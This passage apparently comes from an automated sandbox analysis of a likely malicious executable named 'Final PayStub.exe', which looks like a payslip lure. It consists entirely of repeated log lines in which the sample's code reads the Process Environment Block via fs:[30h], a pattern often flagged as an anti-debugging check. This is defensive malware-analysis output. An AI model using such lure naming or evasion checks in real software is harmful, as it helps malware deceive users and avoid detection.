Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386154 mov eax, dword ptr fs:[00000030h]	6_2_01386154
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014461C3 mov eax, dword ptr fs:[00000030h]	6_2_014461C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014461C3 mov eax, dword ptr fs:[00000030h]	6_2_014461C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014561E5 mov eax, dword ptr fs:[00000030h]	6_2_014561E5
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137A197 mov eax, dword ptr fs:[00000030h]	6_2_0137A197
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137A197 mov eax, dword ptr fs:[00000030h]	6_2_0137A197
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137A197 mov eax, dword ptr fs:[00000030h]	6_2_0137A197
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C0185 mov eax, dword ptr fs:[00000030h]	6_2_013C0185
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01424180 mov eax, dword ptr fs:[00000030h]	6_2_01424180
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01424180 mov eax, dword ptr fs:[00000030h]	6_2_01424180
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B01F8 mov eax, dword ptr fs:[00000030h]	6_2_013B01F8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143C188 mov eax, dword ptr fs:[00000030h]	6_2_0143C188
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143C188 mov eax, dword ptr fs:[00000030h]	6_2_0143C188
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140019F mov eax, dword ptr fs:[00000030h]	6_2_0140019F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140019F mov eax, dword ptr fs:[00000030h]	6_2_0140019F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140019F mov eax, dword ptr fs:[00000030h]	6_2_0140019F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140019F mov eax, dword ptr fs:[00000030h]	6_2_0140019F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE1D0 mov eax, dword ptr fs:[00000030h]	6_2_013FE1D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE1D0 mov eax, dword ptr fs:[00000030h]	6_2_013FE1D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_013FE1D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE1D0 mov eax, dword ptr fs:[00000030h]	6_2_013FE1D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE1D0 mov eax, dword ptr fs:[00000030h]	6_2_013FE1D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406050 mov eax, dword ptr fs:[00000030h]	6_2_01406050
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137A020 mov eax, dword ptr fs:[00000030h]	6_2_0137A020
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137C020 mov eax, dword ptr fs:[00000030h]	6_2_0137C020
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E016 mov eax, dword ptr fs:[00000030h]	6_2_0139E016
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E016 mov eax, dword ptr fs:[00000030h]	6_2_0139E016
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E016 mov eax, dword ptr fs:[00000030h]	6_2_0139E016
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E016 mov eax, dword ptr fs:[00000030h]	6_2_0139E016
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01404000 mov ecx, dword ptr fs:[00000030h]	6_2_01404000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01422000 mov eax, dword ptr fs:[00000030h]	6_2_01422000
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AC073 mov eax, dword ptr fs:[00000030h]	6_2_013AC073
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01382050 mov eax, dword ptr fs:[00000030h]	6_2_01382050
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01416030 mov eax, dword ptr fs:[00000030h]	6_2_01416030
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014020DE mov eax, dword ptr fs:[00000030h]	6_2_014020DE
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014060E0 mov eax, dword ptr fs:[00000030h]	6_2_014060E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138208A mov eax, dword ptr fs:[00000030h]	6_2_0138208A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0137C0F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C20F0 mov ecx, dword ptr fs:[00000030h]	6_2_013C20F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013880E9 mov eax, dword ptr fs:[00000030h]	6_2_013880E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0137A0E3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014180A8 mov eax, dword ptr fs:[00000030h]	6_2_014180A8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014460B8 mov eax, dword ptr fs:[00000030h]	6_2_014460B8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014460B8 mov ecx, dword ptr fs:[00000030h]	6_2_014460B8
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01402349 mov eax, dword ptr fs:[00000030h]	6_2_01402349
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144A352 mov eax, dword ptr fs:[00000030h]	6_2_0144A352
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140035C mov eax, dword ptr fs:[00000030h]	6_2_0140035C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140035C mov eax, dword ptr fs:[00000030h]	6_2_0140035C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140035C mov eax, dword ptr fs:[00000030h]	6_2_0140035C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140035C mov ecx, dword ptr fs:[00000030h]	6_2_0140035C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140035C mov eax, dword ptr fs:[00000030h]	6_2_0140035C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140035C mov eax, dword ptr fs:[00000030h]	6_2_0140035C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137C310 mov ecx, dword ptr fs:[00000030h]	6_2_0137C310
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A0310 mov ecx, dword ptr fs:[00000030h]	6_2_013A0310
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA30B mov eax, dword ptr fs:[00000030h]	6_2_013BA30B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA30B mov eax, dword ptr fs:[00000030h]	6_2_013BA30B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA30B mov eax, dword ptr fs:[00000030h]	6_2_013BA30B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142437C mov eax, dword ptr fs:[00000030h]	6_2_0142437C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014063C0 mov eax, dword ptr fs:[00000030h]	6_2_014063C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143C3CD mov eax, dword ptr fs:[00000030h]	6_2_0143C3CD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014243D4 mov eax, dword ptr fs:[00000030h]	6_2_014243D4
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014243D4 mov eax, dword ptr fs:[00000030h]	6_2_014243D4
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E3DB mov eax, dword ptr fs:[00000030h]	6_2_0142E3DB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E3DB mov eax, dword ptr fs:[00000030h]	6_2_0142E3DB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E3DB mov ecx, dword ptr fs:[00000030h]	6_2_0142E3DB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142E3DB mov eax, dword ptr fs:[00000030h]	6_2_0142E3DB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01378397 mov eax, dword ptr fs:[00000030h]	6_2_01378397
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01378397 mov eax, dword ptr fs:[00000030h]	6_2_01378397
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01378397 mov eax, dword ptr fs:[00000030h]	6_2_01378397
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A438F mov eax, dword ptr fs:[00000030h]	6_2_013A438F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A438F mov eax, dword ptr fs:[00000030h]	6_2_013A438F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137E388 mov eax, dword ptr fs:[00000030h]	6_2_0137E388
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137E388 mov eax, dword ptr fs:[00000030h]	6_2_0137E388
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137E388 mov eax, dword ptr fs:[00000030h]	6_2_0137E388
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B63FF mov eax, dword ptr fs:[00000030h]	6_2_013B63FF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0139E3F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0139E3F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0139E3F0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013903E9 mov eax, dword ptr fs:[00000030h]	6_2_013903E9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0138A3C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0138A3C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0138A3C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0138A3C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0138A3C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0138A3C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013883C0 mov eax, dword ptr fs:[00000030h]	6_2_013883C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013883C0 mov eax, dword ptr fs:[00000030h]	6_2_013883C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013883C0 mov eax, dword ptr fs:[00000030h]	6_2_013883C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013883C0 mov eax, dword ptr fs:[00000030h]	6_2_013883C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01408243 mov eax, dword ptr fs:[00000030h]	6_2_01408243
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01408243 mov ecx, dword ptr fs:[00000030h]	6_2_01408243
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137823B mov eax, dword ptr fs:[00000030h]	6_2_0137823B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143A250 mov eax, dword ptr fs:[00000030h]	6_2_0143A250
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143A250 mov eax, dword ptr fs:[00000030h]	6_2_0143A250
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01430274 mov eax, dword ptr fs:[00000030h]	6_2_01430274
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384260 mov eax, dword ptr fs:[00000030h]	6_2_01384260
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384260 mov eax, dword ptr fs:[00000030h]	6_2_01384260
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384260 mov eax, dword ptr fs:[00000030h]	6_2_01384260
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137826B mov eax, dword ptr fs:[00000030h]	6_2_0137826B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386259 mov eax, dword ptr fs:[00000030h]	6_2_01386259
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137A250 mov eax, dword ptr fs:[00000030h]	6_2_0137A250
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013902A0 mov eax, dword ptr fs:[00000030h]	6_2_013902A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013902A0 mov eax, dword ptr fs:[00000030h]	6_2_013902A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE284 mov eax, dword ptr fs:[00000030h]	6_2_013BE284
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE284 mov eax, dword ptr fs:[00000030h]	6_2_013BE284
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01400283 mov eax, dword ptr fs:[00000030h]	6_2_01400283
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01400283 mov eax, dword ptr fs:[00000030h]	6_2_01400283
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01400283 mov eax, dword ptr fs:[00000030h]	6_2_01400283
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013902E1 mov eax, dword ptr fs:[00000030h]	6_2_013902E1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013902E1 mov eax, dword ptr fs:[00000030h]	6_2_013902E1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013902E1 mov eax, dword ptr fs:[00000030h]	6_2_013902E1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014162A0 mov eax, dword ptr fs:[00000030h]	6_2_014162A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014162A0 mov ecx, dword ptr fs:[00000030h]	6_2_014162A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014162A0 mov eax, dword ptr fs:[00000030h]	6_2_014162A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014162A0 mov eax, dword ptr fs:[00000030h]	6_2_014162A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014162A0 mov eax, dword ptr fs:[00000030h]	6_2_014162A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014162A0 mov eax, dword ptr fs:[00000030h]	6_2_014162A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0138A2C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0138A2C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0138A2C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0138A2C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0138A2C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE53E mov eax, dword ptr fs:[00000030h]	6_2_013AE53E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE53E mov eax, dword ptr fs:[00000030h]	6_2_013AE53E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE53E mov eax, dword ptr fs:[00000030h]	6_2_013AE53E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE53E mov eax, dword ptr fs:[00000030h]	6_2_013AE53E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE53E mov eax, dword ptr fs:[00000030h]	6_2_013AE53E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535 mov eax, dword ptr fs:[00000030h]	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535 mov eax, dword ptr fs:[00000030h]	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535 mov eax, dword ptr fs:[00000030h]	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535 mov eax, dword ptr fs:[00000030h]	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535 mov eax, dword ptr fs:[00000030h]	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390535 mov eax, dword ptr fs:[00000030h]	6_2_01390535
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01416500 mov eax, dword ptr fs:[00000030h]	6_2_01416500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01454500 mov eax, dword ptr fs:[00000030h]	6_2_01454500
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B656A mov eax, dword ptr fs:[00000030h]	6_2_013B656A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B656A mov eax, dword ptr fs:[00000030h]	6_2_013B656A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B656A mov eax, dword ptr fs:[00000030h]	6_2_013B656A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388550 mov eax, dword ptr fs:[00000030h]	6_2_01388550
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388550 mov eax, dword ptr fs:[00000030h]	6_2_01388550
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A45B1 mov eax, dword ptr fs:[00000030h]	6_2_013A45B1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A45B1 mov eax, dword ptr fs:[00000030h]	6_2_013A45B1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE59C mov eax, dword ptr fs:[00000030h]	6_2_013BE59C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B4588 mov eax, dword ptr fs:[00000030h]	6_2_013B4588
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01382582 mov eax, dword ptr fs:[00000030h]	6_2_01382582
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01382582 mov ecx, dword ptr fs:[00000030h]	6_2_01382582
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC5ED mov eax, dword ptr fs:[00000030h]	6_2_013BC5ED
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC5ED mov eax, dword ptr fs:[00000030h]	6_2_013BC5ED
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013825E0 mov eax, dword ptr fs:[00000030h]	6_2_013825E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE5E7 mov eax, dword ptr fs:[00000030h]	6_2_013AE5E7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014005A7 mov eax, dword ptr fs:[00000030h]	6_2_014005A7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014005A7 mov eax, dword ptr fs:[00000030h]	6_2_014005A7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014005A7 mov eax, dword ptr fs:[00000030h]	6_2_014005A7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013865D0 mov eax, dword ptr fs:[00000030h]	6_2_013865D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA5D0 mov eax, dword ptr fs:[00000030h]	6_2_013BA5D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA5D0 mov eax, dword ptr fs:[00000030h]	6_2_013BA5D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE5CF mov eax, dword ptr fs:[00000030h]	6_2_013BE5CF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE5CF mov eax, dword ptr fs:[00000030h]	6_2_013BE5CF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA430 mov eax, dword ptr fs:[00000030h]	6_2_013BA430
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137C427 mov eax, dword ptr fs:[00000030h]	6_2_0137C427
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143A456 mov eax, dword ptr fs:[00000030h]	6_2_0143A456
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137E420 mov eax, dword ptr fs:[00000030h]	6_2_0137E420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137E420 mov eax, dword ptr fs:[00000030h]	6_2_0137E420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137E420 mov eax, dword ptr fs:[00000030h]	6_2_0137E420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140C460 mov ecx, dword ptr fs:[00000030h]	6_2_0140C460
